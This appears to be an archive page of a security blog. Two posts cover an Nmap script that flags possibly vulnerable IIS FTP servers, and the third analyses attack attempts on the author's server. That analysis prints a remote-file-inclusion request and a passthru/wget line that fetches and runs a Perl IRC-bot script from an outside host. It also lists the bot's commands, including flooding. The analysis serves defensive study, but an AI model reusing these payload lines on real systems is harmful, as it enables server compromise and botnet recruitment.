Tag Archives: Exploit

Updated: IIS-FTP Nmap Script

September 1, 2009 17:52 | 4 Comments |

Exploit Target

Yesterday, I posted an article about a Nmap script to detect potentially vulnerable Microsoft IIS FTP servers.

I updated the script which now allows an alternative FTP user and password pair to be passed via the command line (thanks to Chris for the comment). If no arguments are provided, an anonymous FTP session will be started.

Example:

# nmap -p 21 -sV --script=IIS-FTP --scriptargs=ftpuser=foo,ftppass=bar 10.0.0.7

The script location remains the same.

Posted in: OS, Security, Software | Tagged: , , , ,

Detecting Vulnerable IIS-FTP Hosts Using Nmap

September 1, 2009 00:36 | 10 Comments |

Exploit Target
A new 0-day exploit for the FTP server included within the Microsoft IIS suite has been released today. Check the post on the Full Disclosure mailing list for more details.

Based on an existing Nmap script, I quickly wrote a new one which performs the following actions:

  • Check if anonymous sessions are allowed.
  • Check if the detected FTP server is running Microsoft ftpd.
  • Check if the MKDIR command is allowed (this seems to be required by the exploit)

If all those conditions are met, the script exits with a warning message. Note that my script will only report servers which could be vulnerable. On the other side, running a server with anonymous users able to create directories is a major security breach and must be fixed independently of the newly discovered vulnerability!

To use the Nmap script, copy it in your local script repositoty (something like /usr/local/share/nmap/scripts/) and rebuild your scripts index:

# nmap --script-updatedb

Then, the script will be executed against all detected FTP servers (using the “-Sc” argument) or you can specify only one script to be executed (for speed):

# nmap -p 21 -sV --script=IIS-FTP 10.0.0.7

Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST
Interesting ports on test-win (10.0.0.7):
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
Service Info: OS: Windows

The script is available here. Note that it is provided “as is”. it’s just a quick hack which worked for me.

Maybe you were not aware of the Nmap scripting capabilities. Feel free to read this small introduction to Nmap scripting.

Posted in: OS, Security, Software | Tagged: , , , ,

carprss.php Exploit

March 4, 2008 00:09 | 1 Comment |

0wn3d! Since 29 February, this blog was hit by 400+ attempts to compromize the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromized hosts:

# awk '{ print $1 }' <carprss.tmp  | sort -nu
64.128.80.82
64.185.237.176
64.22.112.178
64.255.254.10
64.69.32.173
65.254.53.145
65.36.169.130
68.76.31.154
72.29.80.167
87.101.4.42
87.106.48.129
87.230.84.213
88.198.141.110
88.61.196.190
140.127.223.39
147.102.106.10
193.188.66.23
202.143.142.163
203.200.217.210
203.204.97.53
207.44.248.81
208.1.62.200
208.69.192.133
211.49.171.159
212.179.41.165
212.241.213.119
213.83.47.82
216.154.215.249
216.191.16.13
217.11.95.5

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
      .shell/site/iyes.txt??

I downloaded the file iyest.txt, it’s a PHP script which contains lot of lines such:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
      hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It set up an IRC bot which try to connect to 61.246.177.225:65500 and join channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New-Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How to avoid this kind of attack? First, run patched software! But how to prevent them?

  • Do not run public servers with administrative right (root).
  • Run the servers in a chroot’d environment.
  • Do not allow outgoing to unusual ports (65500 in this case).
  • Use ACL systems to prevent the servers to executre or access to unusual files or directories. [1]
  • Run an selinux on Linux or systrace on *BSD.

    I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at it “for study only”. If you have more information, let share them!

Posted in: Security | Tagged: , ,